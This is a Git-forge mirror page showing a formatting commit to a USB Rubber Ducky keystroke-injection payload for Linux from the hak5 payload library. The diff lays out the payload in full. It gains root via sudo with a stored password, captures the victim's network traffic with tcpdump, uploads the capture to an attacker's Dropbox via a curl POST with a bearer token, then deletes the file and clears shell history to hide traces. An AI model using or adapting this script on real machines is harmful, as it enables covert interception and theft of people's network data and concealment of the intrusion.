hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Good Formatting 

Update some STRING to STRINGLN
pull/278/head
Alessandro 2023-04-07 15:05:29 +02:00
parent f3a3da4820
commit a870774553
1 changed files with 11 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
View File

@ -33,11 +33,9 @@ DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
STRINGLN sudo su
DELAY 1000
STRING SUDO_PASS
ENTER
STRINGLN SUDO_PASS
DELAY 1000
@ -57,25 +55,21 @@ ENTER
DELAY 500
REM Network card name
STRING net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
ENTER
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
DELAY 500
REM Network dump
STRING tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
ENTER
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
DELAY 500
REM Get PID
STRING tcpdump_pid=$!
ENTER
STRINGLN tcpdump_pid=$!
REM Set how long you want to sniff
DELAY 60000
REM Kill the process by PID
STRING kill $tcpdump_pid
ENTER
STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION ####
@ -87,8 +81,7 @@ STRING "
ENTER
DELAY 500
STRING DROPBOX_FOLDER="/Exfiltration"
ENTER
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
STRING curl -X POST
@ -97,23 +90,18 @@ STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg:
ENTER
REM #### REMOVE TRACES ####
STRING rm "$FILE_PATH"
ENTER
STRINGLN rm "$FILE_PATH"
DELAY 500
STRING history -c
ENTER
STRINGLN history -c
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
STRINGLN exit
DELAY 500
REM Close the shell
STRING exit
ENTER
STRINGLN exit